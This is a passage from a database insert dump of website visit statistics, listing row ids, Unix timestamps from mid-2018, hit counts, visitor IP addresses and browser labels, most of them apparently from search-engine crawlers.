15,0,0,'157.55.39.102','other'),(270277,1531109805,1,1,0,0,'54.36.148.225','other'),(270278,1531110180,1,1,0,0,'66.249.69.185','chrome'),(270279,1531110193,2,0,2,0,'66.249.69.187',''),(270280,1531110336,1,1,0,0,'54.36.148.41','other'),(270281,1531110365,1,1,0,0,'95.163.255.98','other'),(270282,1531110382,1,1,0,0,'54.36.148.80','other'),(270283,1531110460,2,2,0,0,'216.244.66.241','other'),(270284,1531111177,1,0,1,0,'66.249.69.185',''),(270285,1531111398,1,0,1,0,'66.249.69.230',''),(270286,1531111517,1,1,0,0,'37.9.113.132','other'),(270287,1531111553,1,1,0,0,'13.66.205.121','other'),(270288,1531111650,2,0,2,0,'66.249.69.189',''),(270289,1531111659,1,1,0,0,'54.36.148.52','other'),(270290,1531111805,5,0,5,0,'66.249.69.228',''),(270291,1531112327,4,0,4,0,'66.249.69.230',''),(270292,1531112358,1,1,0,0,'54.36.148.169','other'),(270293,1531112560,1,0,1,0,'66.249.69.189',''),(270294,1531112607,3,1,2,0,'66.249.69.189',''),(270295,1531112618,1,1,0,0,'54.36.149.62','other'),(270296,1531112689,2,2,0,0,'216.244.66.241','other'),(270297,1531112712,1,0,1,0,'66.249.69.185',''),(270298,1531113030,1,1,0,0,'54.36.148.156','other'),(270299,1531113137,1,1,0,0,'54.36.149.4','other'),(270300,1531113435,1,0,1,0,'66.249.69.232',''),(270301,1531113710,1,1,0,0,'91.124.182.170','firefox'),(270302,1531113794,2,2,0,0,'91.196.178.88','chrome'),(270303,1531113879,3,3,0,0,'216.244.66.241','other'),(270304,1531114033,1,0,1,0,'66.249.69.187',''),(270305,1531114089,1,1,0,0,'95.163.255.104','other'),(270306,1531114095,1,1,0,0,'95.163.255.119','other'),(270307,1531114101,1,1,0,0,'95.163.255.113','other'),(270308,1531114109,1,1,0,0,'95.163.255.116','other'),(270309,1531114111,2,0,2,0,'66.249.69.185',''),(270310,1531114313,1,0,1,0,'66.249.69.228',''),(270311,1531114505,2,2,0,0,'91.196.178.187','chrome'),(270312,1531114557,1,1,0,0,'54.36.148.34','other'),(270313,1531114725,2,2,0,0,'91.196.178.88','chrome'),(270314,1531115101,1,1,0,0,'37.52.151.120','chrome'),(270315,1531115105,1,1,0,0,'54.36.149.30','other'),(270316,1531115171,15,15,0,0,'5.9.155.226','other'),(270317,1531115661,3,3,0,0,'216.244.66.241','other'),(270318,1531115761,1,1,0,0,'46.201.167.160','chrome'),(270319,1531115800,1,1,0,0,'54.36.149.34','other'),(270320,1531115802,1,1,0,0,'54.36.149.24','other'),(270321,1531115874,1,1,0,0,'66.249.69.189','chrome'),(270322,1531116034,1,1,0,0,'54.36.149.1','other'),(270323,1531116067,1,1,0,0,'91.124.182.170','firefox'),(270324,1531116217,1,1,0,0,'54.36.148.234','other'),(270325,1531116343,1,1,0,0,'91.196.178.187','chrome'),(270326,1531116355,1,1,0,0,'8.29.198.25','other'),(270327,1531116473,1,1,0,0,'54.36.149.33','other'),(270328,1531116507,2,2,0,0,'91.196.178.169','chrome'),(270329,1531116646,1,0,1,0,'66.249.69.228',''),(270330,1531116718,1,1,0,0,'173.249.24.45','firefox'),(270331,1531116976,1,0,1,0,'66.249.69.232',''),(270332,1531117173,1,1,0,0,'91.196.177.46','chrome'),(270333,1531117353,1,1,0,0,'54.36.148.71','other'),(270334,1531117647,1,1,0,0,'54.36.149.39','other'),(270335,1531117728,1,1,0,0,'54.36.149.60','other'),(270336,1531117972,1,1,0,0,'54.36.148.154','other'),(270337,1531117982,1,1,0,0,'54.36.148.74','other'),(270338,1531118496,1,1,0,0,'54.36.148.228','other'),(270339,1531118552,1,1,0,0,'54.36.148.134','other'),(270340,1531118930,2,2,0,0,'216.244.66.241','other'),(270341,1531119049,2,1,1,0,'66.249.69.185',''),(270342,1531119131,1,1,0,0,'66.249.69.189','chrome'),(270343,1531119156,1,1,0,0,'66.249.69.187','chrome'),(270344,1531119434,2,2,0,0,'91.196.177.46','chrome'),(270345,1531119662,1,1,0,0,'157.55.39.102','other'),(270346,1531119663,1,1,0,0,'54.36.148.39','other'),(270347,1531119666,1,1,0,0,'95.134.202.81','chrome'),(270348,1531119722,1,1,0,0,'54.36.148.143','other'),(270349,1531119738,1,1,0,0,'54.36.149.36','other'),(270350,1531119749,1,1,0,0,'54.36.148.197','other'),(270351,1531120082,1,1,0,0,'54.36.148.58','other'),(270352,1531120233,1,1,0,0,'54.36.148.222','other'),(270353,1531120285,1,1,0,0,'54.36.148.205','other'),(270354,1531120372,1,1,0,0,'8.29.198.26','other'),(270355,1531120381,1,1,0,0,'69.30.205.218','other'),(270356,1531120479,1,1,0,0,'162.210.196.130','other'),(270357,1531120556,1,1,0,0,'91.196.177.46','chrome'),(270358,1531120619,1,1,0,0,'54.36.149.62','other'),(270359,1531120983,6,6,0,0,'216.244.66.241','other'),(270360,1531121143,1,1,0,0,'91.215.53.246','chrome'),(270361,1531121523,1,1,0,0,'54.36.148.97','other'),(270362,1531121884,1,1,0,0,'54.36.148.38','other'),(270363,1531122129,1,1,0,0,'54.36.148.198','other'),(270364,1531122297,1,1,0,0,'54.36.148.243','other'),(270365,1531122403,1,1,0,0,'54.36.148.155','other'),(270366,1531122447,2,2,0,0,'78.111.185.136','chrome'),(270367,1531123182,1,1,0,0,'216.244.66.241','other'),(270368,1531123236,1,1,0,0,'54.36.148.193','other'),(270369,1531123616,1,1,0,0,'54.36.148.188','other'),(270370,1531123684,198,198,0,0,'5.9.71.213','other'),(270371,1531123734,1,1,0,0,'54.36.148.145','other'),(270372,1531123840,1,1,0,0,'54.36.148.114','other'),(270373,1531123879,1,1,0,0,'54.36.148.35','other'),(270374,1531123922,1,1,0,0,'91.196.177.206','chrome'),(270375,1531124046,1,1,0,0,'54.36.148.47','other'),(270376,1531124363,1,1,0,0,'216.244.66.241','other'),(270377,1531124755,2,2,0,0,'91.196.177.46','chrome'),(270378,1531125341,1,1,0,0,'54.36.149.4','other'),(270379,1531125585,1,1,0,0,'91.196.178.129','firefox'),(270380,1531125766,1,1,0,0,'66.249.69.185','chrome'),(270381,1531125831,1,0,1,0,'66.249.69.228',''),(270382,1531125927,1,1,0,0,'91.196.178.71','firefox'),(270383,1531125958,1,1,0,0,'54.36.148.245','other'),(270384,1531125985,1,1,0,0,'216.244.66.241','other'),(270385,1531126035,1,1,0,0,'46.211.133.200','chrome'),(270386,1531126103,1,1,0,0,'178.95.66.69','chrome'),(270387,1531126448,1,1,0,0,'54.36.149.32','other'),(270388,1531126462,1,1,0,0,'91.124.182.170','firefox'),(270389,1531126626,1,1,0,0,'54.36.149.18','other'),(270390,1531126644,1,1,0,0,'94.153.192.46','firefox'),(270391,1531126786,22,22,0,0,'95.216.15.189','other'),(270392,1531126794,22,22,0,0,'95.216.5.212','other'),(270393,1531126854,1,1,0,0,'54.36.148.226','other'),(270394,1531126898,3,3,0,0,'216.244.66.241','other'),(270395,1531127045,1,1,0,0,'91.196.178.86','firefox'),(270396,1531127186,1,1,0,0,'54.36.149.67','other'),(270397,1531127200,1,1,0,0,'8.29.198.26','other'),(270398,1531127347,1,1,0,0,'54.36.148.35','other'),(270399,1531127379,1,1,0,0,'54.36.148.142','other'),(270400,1531127408,2,2,0,0,'109.108.87.48','chrome'),(270401,1531127461,1,1,0,0,'66.249.69.187','chrome'),(270402,1531127657,1,1,0,0,'54.36.148.31','other'),(270403,1531127828,1,1,0,0,'91.196.178.91','firefox'),(270404,1531127888,1,1,0,0,'66.249.69.228','chrome'),(270405,1531127909,1,1,0,0,'46.201.84.53','firefox'),(270406,1531128192,2,2,0,0,'130.180.218.22','chrome'),(270407,1531128202,3,3,0,0,'216.244.66.241','other'),(270408,1531128361,1,1,0,0,'91.196.178.88','chrome'),(270409,1531128525,1,1,0,0,'54.36.148.229','other'),(270410,1531128811,1,1,0,0,'54.36.148.211','other'),(270411,1531128959,1,1,0,0,'54.36.148.122','other'),(270412,1531128974,1,1,0,0,'54.36.148.54','other'),(270413,1531129130,1,1,0,0,'176.120.110.9','chrome'),(270414,1531129333,1,0,1,0,'66.249.69.230',''),(270415,1531129377,1,1,0,0,'54.36.149.94','other'),(270416,1531129929,1,1,0,0,'54.36.148.38','other'),(270417,1531130276,2,2,0,0,'109.108.87.48','chrome'),(270418,1531130413,1,1,0,0,'54.36.149.85','other'),(270419,1531130970,1,1,0,0,'46.211.152.2','other'),(270420,1531131047,1,1,0,0,'54.36.148.246','other'),(270421,1531131191,1,1,0,0,'91.196.178.91','firefox'),(270422,1531131196,1,1,0,0,'8.29.198.27','other'),(270423,1531131229,1,1,0,0,'66.249.69.189','chrome'),(270424,1531131518,1,1,0,0,'54.36.148.162','other'),(270425,1531131590,1,1,0,0,'54.36.148.87','other'),(270426,1531131670,1,1,0,0,'54.36.148.169','other'),(270427,1531131744,1,1,0,0,'54.36.148.34','other'),(270428,1531131910,3,3,0,0,'216.244.66.241','other'),(270429,1531132152,1,1,0,0,'54.36.148.71','other'),(270430,1531132171,1,1,0,0,'54.36.148.39','other'),(270431,1531132309,1,1,0,0,'54.36.148.217','other'),(270432,1531132600,1,1,0,0,'80.93.126.34','chrome'),(270433,1531132722,1,1,0,0,'54.36.148.115','other'),(270434,1531132907,1,1,0,0,'66.249.69.187','chrome'),(270435,1531132998,1,1,0,0,'95.134.209.69','chrome'),(270436,1531133007,1,1,0,0,'54.36.148.116','other'),(270437,1531133021,1,1,0,0,'216.244.66.241','other'),(270438,1531133312,1,1,0,0,'54.36.148.192','other'),(270439,1531133315,1,1,0,0,'54.36.149.38','other'),(270440,1531133327,1,0,1,0,'66.249.69.185',''),(270441,1531133338,1,1,0,0,'54.36.148.118','other'),(270442,1531133499,1,1,0,0,'54.36.148.48','other'),(270443,1531134046,1,1,0,0,'54.36.149.8','other'),(270444,1531134102,1,1,0,0,'54.36.148.16','other'),(270445,1531134114,1,1,0,0,'188.226.170.140','chrome'),(270446,1531134629,1,1,0,0,'216.244.66.241','other'),(270447,1531134926,1,1,0,0,'157.55.39.100','other'),(270448,1531135220,1,0,1,0,'66.249.69.185',''),(270449,1531135234,1,1,0,0,'95.163.255.188','other'),(270450,1531135281,1,1,0,0,'94.179.147.66','chrome'),(270451,1531135411,1,1,0,0,'54.36.149.19','other'),(270452,1531135873,1,1,0,0,'54.36.148.229','other'),(270453,1531136169,1,1,0,0,'54.36.148.165','other'),(270454,1531136191,1,0,1,0,'66.249.69.185',''),(270455,1531136730,1,1,0,0,'91.196.177.46','chrome'),(270456,1531136941,1,1,0,0,'54.36.148.67','other'),(270457,1531137019,1,1,0,0,'66.249.69.189','chrome'),(270458,1531137029,3,2,1,0,'66.249.69.185',''),(270459,1531137111,1,1,0,0,'54.36.148.41','other'),(270460,1531137379,1,1,0,0,'54.36.148.23','other'),(270461,1531137682,1,1,0,0,'91.202.111.1','chrome'),(270462,1531137856,1,1,0,0,'54.36.148.25','other'),(270463,1531138019,1,1,0,0,'46.173.174.9','chrome'),(270464,1531138053,1,1,0,0,'8.29.198.27','other'),(270465,1531138209,2,2,0,0,'91.196.178.71','chrome'),(270466,1531138445,1,1,0,0,'54.36.148.89','other'),(270467,1531138834,1,0,1,0,'66.249.69.189',''),(270468,1531138976,1,1,0,0,'54.36.148.31','other'),(270469,1531139035,1,1,0,0,'54.36.148.125','other'),(270470,1531139185,2,2,0,0,'91.196.178.88','chrome'),(270471,1531139234,2,2,0,0,'216.244.66.241','other'),(270472,1531139563,1,1,0,0,'54.36.148.201','other'),(270473,1531139629,1,1,0,0,'54.36.148.163','other'),(270474,1531139734,1,1,0,0,'54.36.149.96','other'),(270475,1531139785,1,1,0,0,'54.36.148.71','other'),(270476,1531139990,1,0,1,0,'66.249.69.228',''),(270477,1531140500,1,0,1,0,'66.249.69.187',''),(270478,1531140546,1,1,0,0,'54.36.148.161','other'),(270479,1531140556,1,1,0,0,'54.36.149.64','other'),(270480,1531140612,1,1,0,0,'54.36.149.83','other'),(270481,1531140892,1,1,0,0,'91.124.182.170','firefox'),(270482,1531141128,1,1,0,0,'40.77.167.53','other'),(270483,1531141516,1,1,0,0,'176.118.54.207','chrome'),(270484,1531141652,1,1,0,0,'54.36.148.219','other'),(270485,1531141769,1,1,0,0,'141.8.142.74','other'),(270486,1531141824,2,2,0,0,'46.201.113.225','chrome'),(270487,1531141850,1,1,0,0,'54.36.148.167','other'),(270488,1531141904,1,1,0,0,'31.184.199.178','firefox'),(270489,1531142028,1,1,0,0,'93.183.247.55','chrome'),(270490,1531142035,2,1,1,0,'66.249.69.189',''),(270491,1531142045,1,1,0,0,'8.29.198.25','other'),(270492,1531142142,1,1,0,0,'66.249.69.187','chrome'),(270493,1531142303,3,3,0,0,'46.211.104.27','other'),(270494,1531142415,1,1,0,0,'194.50.254.171','other'),(270495,1531142708,1,0,1,0,'66.249.69.230',''),(270496,1531142765,1,1,0,0,'54.36.148.223','other'),(270497,1531142832,1,1,0,0,'91.124.182.170','firefox'),(270498,1531143095,1,1,0,0,'54.36.148.154','other'),(270499,1531143152,12,12,0,0,'178.63.34.189','other'),(270500,1531144029,2,2,0,0,'91.196.178.88','chrome'),(270501,1531144164,1,1,0,0,'94.178.6.186','chrome'),(270502,1531144327,1,0,1,0,'66.249.69.189',''),(270503,1531144355,1,1,0,0,'54.36.149.73','other'),(270504,1531144424,1,1,0,0,'54.36.148.217','other'),(270505,1531144482,1,1,0,0,'91.196.178.133','chrome'),(270506,1531144885,1,1,0,0,'54.36.148.203','other'),(270507,1531144915,1,1,0,0,'54.36.148.111','other'),(270508,1531144941,1,0,1,0,'66.249.69.187',''),(270509,1531144971,1,1,0,0,'216.244.66.241','other'),(270510,1531145271,2,0,2,0,'66.249.69.185',''),(270511,1531145346,1,1,0,0,'54.36.148.65','other'),(270512,1531145501,1,1,0,0,'66.102.9.29','chrome'),(270513,1531145801,1,1,0,0,'95.163.255.154','other'),(270514,1531146057,1,1,0,0,'178.154.171.88','other'),(270515,1531146064,3,3,0,0,'216.244.66.241','other'),(270516,1531146101,1,1,0,0,'180.76.15.19','other'),(270517,1531146277,1,1,0,0,'37.52.151.120','chrome'),(270518,1531146816,1,1,0,0,'54.36.148.130','other'),(270519,1531146875,1,0,1,0,'66.249.69.187',''),(270520,1531147067,2,2,0,0,'216.244.66.241','other'),(270521,1531147267,1,1,0,0,'66.249.69.187','chrome'),(270522,1531147814,1,1,0,0,'54.36.148.222','other'),(270523,1531147819,1,1,0,0,'91.196.178.73','firefox'),(270524,1531148085,1,0,1,0,'66.249.69.189',''),(270525,1531148101,1,1,0,0,'180.76.15.26','other'),(270526,1531148285,1,0,1,0,'66.249.69.187',''),(270527,1531148890,1,1,0,0,'8.29.198.25','other'),(270528,1531149181,1,0,1,0,'66.249.69.228',''),(270529,1531149353,2,2,0,0,'66.249.69.189','chrome'),(270530,1531149687,2,2,0,0,'216.244.66.241','other'),(270531,1531150509,1,1,0,0,'54.36.148.203','other'),(270532,1531151101,1,0,1,0,'66.249.69.187',''),(270533,1531151117,1,0,1,0,'66.249.69.185',''),(270534,1531151227,1,1,0,0,'54.36.149.5','other'),(270535,1531151719,1,1,0,0,'54.36.148.58','other'),(270536,1531152550,1,1,0,0,'54.36.148.42','other'),(270537,1531152580,1,1,0,0,'91.196.178.89','chrome'),(270538,1531152762,1,0,1,0,'66.249.69.189',''),(270539,1531152865,1,1,0,0,'54.36.148.138','other'),(270540,1531152896,1,1,0,0,'8.29.198.25','other'),(270541,1531152955,1,1,0,0,'54.36.148.93','other'),(270542,1531153039,1,1,0,0,'54.36.148.80','other'),(270543,1531153397,2,2,0,0,'130.180.218.14','chrome'),(270544,1531154154,1,1,0,0,'216.244.66.241','other'),(270545,1531154248,1,0,1,0,'66.249.69.189',''),(270546,1531154369,1,1,0,0,'54.36.148.47','other'),(270547,1531154564,1,1,0,0,'54.36.148.104','other'),(270548,1531154609,1,1,0,0,'66.249.69.187','chrome'),(270549,1531155064,1,1,0,0,'54.36.148.78','other'),(270550,1531155300,1,0,1,0,'66.249.69.189',''),(270551,1531155812,1,1,0,0,'54.36.148.149','other'),(270552,1531155919,1,1,0,0,'54.36.148.79','other'),(270553,1531156171,1,1,0,0,'54.36.149.69','other'),(270554,1531156274,2,2,0,0,'92.113.189.235','chrome'),(270555,1531156369,2,0,2,0,'66.249.69.187',''),(270556,1531156411,1,1,0,0,'54.36.148.114','other'),(270557,1531156565,1,1,0,0,'216.244.66.241','other'),(270558,1531156661,1,1,0,0,'54.36.148.59','other'),(270559,1531157148,1,1,0,0,'54.36.148.211','other'),(270560,1531157191,1,1,0,0,'54.36.148.31','other'),(270561,1531157210,1,1,0,0,'54.36.148.57','other'),(270562,1531157409,1,1,0,0,'54.36.149.46','other'),(270563,1531157423,1,1,0,0,'95.163.255.93','other'),(270564,1531157525,1,1,0,0,'91.124.82.98','chrome'),(270565,1531157534,1,1,0,0,'54.36.149.31','other'),(270566,1531157839,1,0,1,0,'66.249.69.187',''),(270567,1531157840,1,1,0,0,'185.182.81.13','chrome'),(270568,1531158590,1,1,0,0,'66.249.69.230','chrome'),(270569,1531158602,1,1,0,0,'54.36.148.206','other'),(270570,1531158802,1,1,0,0,'54.36.148.238','other'),(270571,1531158823,1,1,0,0,'95.163.255.180','other'),(270572,1531158900,1,1,0,0,'77.111.247.11','chrome'),(270573,1531158904,1,1,0,0,'54.36.148.170','other'),(270574,1531158931,1,1,0,0,'79.254.124.252','chrome'),(270575,1531158973,1,1,0,0,'54.36.148.249','other'),(270576,1531159275,1,1,0,0,'54.36.148.142','other'),(270577,1531159499,1,1,0,0,'54.36.148.117','other'),(270578,1531159720,3,3,0,0,'216.244.66.241','other'),(270579,1531159727,1,1,0,0,'8.29.198.27','other'),(270580,1531159908,1,1,0,0,'66.249.69.185','chrome'),(270581,1531160092,1,1,0,0,'66.249.69.189','chrome'),(270582,1531160495,1,0,1,0,'66.249.69.187',''),(270583,1531160636,1,1,0,0,'216.244.66.241','other'),(270584,1531160723,1,1,0,0,'54.36.149.64','other'),(270585,1531161524,1,1,0,0,'54.36.148.204','other'),(270586,1531161900,1,1,0,0,'54.36.148.53','other'),(270587,1531161923,1,1,0,0,'54.36.148.104','other'),(270588,1531162094,1,1,0,0,'37.73.205.70','chrome'),(270589,1531162188,1,1,0,0,'95.163.255.99','other'),(270590,1531162211,1,0,1,0,'66.249.69.189',''),(270591,1531162293,2,2,0,0,'216.244.66.241','other'),(270592,1531162330,1,1,0,0,'157.55.39.102','other'),(270593,1531162747,1,1,0,0,'54.36.148.141','other'),(270594,1531162809,1,1,0,0,'54.36.148.102','other'),(270595,1531162815,2,0,2,0,'66.249.69.187',''),(270596,1531163100,1,1,0,0,'66.249.69.189','chrome'),(270597,1531163409,1,1,0,0,'54.36.148.173','other'),(270598,1531163484,1,1,0,0,'54.36.148.56','other'),(270599,1531163712,1,1,0,0,'77.111.247.43','chrome'),(270600,1531163718,1,1,0,0,'78.154.167.246','chrome'),(270601,1531163751,1,1,0,0,'8.29.198.25','other'),(270602,1531164128,1,1,0,0,'54.36.148.97','other'),(270603,1531164649,1,1,0,0,'54.36.149.62','other'),(270604,1531164811,1,1,0,0,'54.36.148.66','other'),(270605,1531164814,2,2,0,0,'216.244.66.241','other'),(270606,1531164888,1,1,0,0,'46.200.170.52','firefox'),(270607,1531164913,1,1,0,0,'46.185.2.145','chrome'),(270608,1531165269,1,0,1,0,'66.249.69.185',''),(270609,1531165320,1,1,0,0,'54.36.148.160','other'),(270610,1531165378,1,1,0,0,'66.249.69.185','chrome'),(270611,1531165700,1,1,0,0,'95.163.255.99','other'),(270612,1531165921,1,1,0,0,'216.244.66.241','other'),(270613,1531166466,1,1,0,0,'54.36.149.107','other'),(270614,1531166496,1,1,0,0,'54.36.148.35','other'),(270615,1531166573,1,1,0,0,'54.36.148.131','other'),(270616,1531167165,1,1,0,0,'157.55.39.100','other'),(270617,1531167647,1,0,1,0,'66.249.69.228',''),(270618,1531167665,1,1,0,0,'54.36.148.207','other'),(270619,1531167701,1,1,0,0,'54.36.149.107','other'),(270620,1531167716,2,2,0,0,'91.196.178.183','chrome'),(270621,1531167766,1,1,0,0,'54.36.148.147','other'),(270622,1531167809,1,1,0,0,'54.36.148.186','other'),(270623,1531168133,1,1,0,0,'95.163.255.197','other'),(270624,1531168141,1,1,0,0,'54.36.148.232','other'),(270625,1531168643,1,1,0,0,'54.36.149.73','other'),(270626,1531168894,1,1,0,0,'54.36.149.26','other'),(270627,1531169678,1,1,0,0,'95.163.255.93','other'),(270628,1531169886,1,1,0,0,'54.36.148.245','other'),(270629,1531170031,1,1,0,0,'54.36.148.113','other'),(270630,1531170523,1,1,0,0,'54.36.148.86','other'),(270631,1531170567,1,1,0,0,'8.29.198.27','other'),(270632,1531170569,1,0,1,0,'66.249.69.228',''),(270633,1531170630,3,3,0,0,'216.244.66.241','other'),(270634,1531170685,1,0,1,0,'66.249.69.232',''),(270635,1531170801,1,1,0,0,'66.249.69.185','chrome'),(270636,1531170859,16,16,0,0,'162.144.38.66','other'),(270637,1531170876,10,10,0,0,'162.144.38.66','opera'),(270638,1531170925,1,1,0,0,'54.36.149.67','other'),(270639,1531171514,1,1,0,0,'54.36.149.68','other'),(270640,1531171549,1,1,0,0,'54.36.148.129','other'),(270641,1531172226,1,1,0,0,'157.55.39.86','other'),(270642,1531172635,1,1,0,0,'54.36.148.175','other'),(270643,1531172690,1,1,0,0,'66.249.69.232','chrome'),(270644,1531172803,1,1,0,0,'216.244.66.241','other'),(270645,1531173271,1,1,0,0,'54.36.148.74','other'),(270646,1531173750,1,1,0,0,'54.36.148.93','other'),(270647,1531173800,1,1,0,0,'216.244.66.241','other'),(270648,1531173989,1,1,0,0,'54.36.148.213','other'),(270649,1531174601,1,1,0,0,'8.29.198.25','other'),(270650,1531174666,1,1,0,0,'54.36.148.171','other'),(270651,1531175002,1,1,0,0,'54.36.148.119','other'),(270652,1531175104,1,0,1,0,'66.249.69.187',''),(270653,1531175503,1,1,0,0,'54.36.149.100','other'),(270654,1531175986,1,1,0,0,'54.36.148.124','other'),(270655,1531176154,1,1,0,0,'66.249.69.189','chrome'),(270656,1531176329,1,1,0,0,'54.36.148.28','other'),(270657,1531176731,1,1,0,0,'54.36.148.233','other'),(270658,1531176878,1,1,0,0,'54.36.148.10','other'),(270659,1531176897,1,1,0,0,'54.36.148.65','other'),(270660,1531177279,1,1,0,0,'54.36.148.62','other'),(270661,1531177532,1,1,0,0,'54.36.149.8','other'),(270662,1531178200,1,1,0,0,'178.154.171.88','other'),(270663,1531178612,1,1,0,0,'54.36.148.75','other'),(270664,1531179022,1,1,0,0,'54.36.148.40','other'),(270665,1531179065,1,1,0,0,'54.36.149.107','other'),(270666,1531179188,1,1,0,0,'180.76.15.20','other'),(270667,1531179428,1,1,0,0,'54.36.148.57','other'),(270668,1531179813,1,1,0,0,'54.36.148.173','other'),(270669,1531180472,1,1,0,0,'54.36.148.16','other'),(270670,1531180547,1,0,1,0,'66.249.69.232',''),(270671,1531180575,1,0,1,0,'66.249.69.230',''),(270672,1531180632,1,1,0,0,'54.36.149.45','other'),(270673,1531181006,1,1,0,0,'54.36.148.144','other'),(270674,1531181407,1,1,0,0,'8.29.198.27','other'),(270675,1531181517,1,1,0,0,'54.36.148.198','other'),(270676,1531181803,1,1,0,0,'54.36.149.106','other'),(270677,1531181866,1,1,0,0,'157.55.39.100','other'),(270678,1531181887,1,1,0,0,'54.36.148.119','other'),(270679,1531181977,1,1,0,0,'54.36.148.33','other'),(270680,1531182046,1,0,1,0,'66.249.69.232',''),(270681,1531182231,1,1,0,0,'95.163.255.97','other'),(270682,1531182242,1,1,0,0,'54.36.148.25','other'),(270683,1531182285,1,0,1,0,'66.249.69.230',''),(270684,1531182448,1,1,0,0,'54.36.148.40','other'),(270685,1531182731,1,1,0,0,'95.163.255.168','other'),(270686,1531183007,1,1,0,0,'66.249.69.189','chrome'),(270687,1531183162,1,1,0,0,'87.250.224.46','other'),(270688,1531183220,1,1,0,0,'95.163.255.96','other'),(270689,1531183392,1,1,0,0,'54.36.148.202','other'),(270690,1531183481,1,1,0,0,'54.36.148.23','other'),(270691,1531183567,1,1,0,0,'54.36.148.237','other'),(270692,1531184103,1,1,0,0,'54.36.148.191','other'),(270693,1531184253,1,1,0,0,'54.36.148.255','other'),(270694,1531184284,2,0,2,0,'66.249.69.185',''),(270695,1531184746,1,1,0,0,'66.249.69.232','chrome'),(270696,1531184785,1,1,0,0,'54.36.148.185','other'),(270697,1531184851,1,1,0,0,'66.249.69.185','chrome'),(270698,1531184870,1,0,1,0,'66.249.69.187',''),(270699,1531185118,1,1,0,0,'54.36.148.72','other'),(270700,1531185191,1,1,0,0,'157.55.39.97','other'),(270701,1531185424,1,1,0,0,'54.36.148.111','other'),(270702,1531185432,1,1,0,0,'8.29.198.25','other'),(270703,1531185729,1,1,0,0,'54.36.148.207','other'),(270704,1531186409,1,1,0,0,'54.36.148.172','other'),(270705,1531186503,1,1,0,0,'54.36.148.164','other'),(270706,1531186842,1,1,0,0,'54.36.149.104','other'),(270707,1531186920,1,1,0,0,'54.36.148.41','other'),(270708,1531187157,1,1,0,0,'54.36.149.12','other'),(270709,1531187264,1,1,0,0,'54.36.148.254','other'),(270710,1531187606,1,1,0,0,'216.244.66.241','other'),(270711,1531187621,1,1,0,0,'54.36.148.82','other'),(270712,1531189221,2,2,0,0,'178.154.171.88','other'),(270713,1531189333,1,1,0,0,'54.36.149.36','other'),(270714,1531189379,1,1,0,0,'54.36.149.41','other'),(270715,1531189840,1,1,0,0,'54.36.148.35','other'),(270716,1531190396,2,2,0,0,'216.244.66.241','other'),(270717,1531190793,1,1,0,0,'185.234.216.113','firefox'),(270718,1531190931,2,2,0,0,'95.213.141.126','opera'),(270719,1531190972,4,4,0,0,'141.8.142.74','other'),(270720,1531191060,1,1,0,0,'54.36.148.217','other'),(270721,1531191195,1,1,0,0,'66.249.69.189','chrome'),(270722,1531191393,1,1,0,0,'216.244.66.241','other'),(270723,1531191735,1,1,0,0,'54.36.149.86','other'),(270724,1531192252,1,1,0,0,'8.29.198.25','other'),(270725,1531192367,1,1,0,0,'141.8.142.74','other'),(270726,1531192769,1,1,0,0,'178.154.171.88','other'),(270727,1531192873,1,1,0,0,'54.36.149.62','other'),(270728,1531193045,1,1,0,0,'54.36.148.72','other'),(270729,1531193583,1,1,0,0,'54.36.148.123','other'),(270730,1531193710,1,1,0,0,'216.244.66.241','other'),(270731,1531194022,1,0,1,0,'66.249.69.189',''),(270732,1531194144,1,1,0,0,'54.36.149.65','other'),(270733,1531194361,1,1,0,0,'141.8.142.74','other'),(270734,1531194635,1,1,0,0,'54.36.149.52','other'),(270735,1531195559,1,1,0,0,'54.36.148.216','other'),(270736,1531195935,1,1,0,0,'54.36.148.93','other'),(270737,1531196274,1,1,0,0,'8.29.198.27','other'),(270738,1531196356,1,1,0,0,'95.163.255.116','other'),(270739,1531196365,1,1,0,0,'95.163.255.102','other'),(270740,1531196366,2,2,0,0,'216.244.66.241','other'),(270741,1531196374,1,1,0,0,'54.36.148.112','other'),(270742,1531196377,1,1,0,0,'95.163.255.112','other'),(270743,1531196384,1,1,0,0,'95.163.255.115','other'),(270744,1531196404,1,1,0,0,'180.76.15.136','other'),(270745,1531196585,2,2,0,0,'141.8.142.74','other'),(270746,1531197203,1,1,0,0,'54.36.148.238','other'),(270747,1531197213,28,28,0,0,'145.239.95.15','other'),(270748,1531197510,1,1,0,0,'54.36.148.22','other'),(270749,1531197640,1,0,1,0,'66.249.69.187',''),(270750,1531197683,1,1,0,0,'54.36.148.38','other'),(270751,1531197735,2,0,2,0,'66.249.69.230',''),(270752,1531197826,1,1,0,0,'54.36.148.135','other'),(270753,1531197830,1,1,0,0,'54.36.149.60','other'),(270754,1531197849,1,1,0,0,'54.36.148.11','other'),(270755,1531197896,1,1,0,0,'54.36.148.82','other'),(270756,1531198188,2,1,1,0,'66.249.69.228',''),(270757,1531198197,1,1,0,0,'54.36.149.16','other'),(270758,1531198309,1,0,1,0,'66.249.69.185',''),(270759,1531198400,1,1,0,0,'54.36.148.171','other'),(270760,1531198484,1,1,0,0,'216.244.66.241','other'),(270761,1531198686,1,1,0,0,'54.36.148.114','other'),(270762,1531198769,2,2,0,0,'141.8.142.74','other'),(270763,1531198908,1,1,0,0,'54.36.148.248','other'),(270764,1531199108,1,1,0,0,'5.9.108.254','other'),(270765,1531199224,1,1,0,0,'54.36.148.40','other'),(270766,1531199326,1,1,0,0,'54.36.149.23','other'),(270767,1531199379,1,1,0,0,'54.36.148.37','other'),(270768,1531199435,1,1,0,0,'54.36.149.106','other'),(270769,1531199630,1,1,0,0,'54.36.148.133','other'),(270770,1531199643,1,1,0,0,'54.36.148.228','other'),(270771,1531199650,1,1,0,0,'54.36.149.10','other'),(270772,1531199854,1,0,1,0,'66.249.66.57',''),(270773,1531200111,1,1,0,0,'54.36.149.37','other'),(270774,1531200140,2,2,0,0,'141.8.142.74','other'),(270775,1531200310,1,1,0,0,'54.36.148.221','other'),(270776,1531200404,1,1,0,0,'180.76.15.32','other'),(270777,1531200409,1,1,0,0,'54.36.148.219','other'),(270778,1531200589,2,2,0,0,'91.196.178.88','chrome'),(270779,1531200629,1,1,0,0,'91.124.182.170','firefox'),(270780,1531200674,1,1,0,0,'54.36.149.70','other'),(270781,1531200759,1,1,0,0,'54.36.148.54','other'),(270782,1531200795,1,1,0,0,'54.36.148.174','other'),(270783,1531200839,1,1,0,0,'185.126.252.138','chrome'),(270784,1531201286,4,4,0,0,'216.244.66.241','other'),(270785,1531201429,1,1,0,0,'54.36.148.179','other'),(270786,1531201833,2,2,0,0,'141.8.142.74','other'),(270787,1531202036,1,1,0,0,'54.36.149.29','other'),(270788,1531202055,1,1,0,0,'54.36.148.104','other'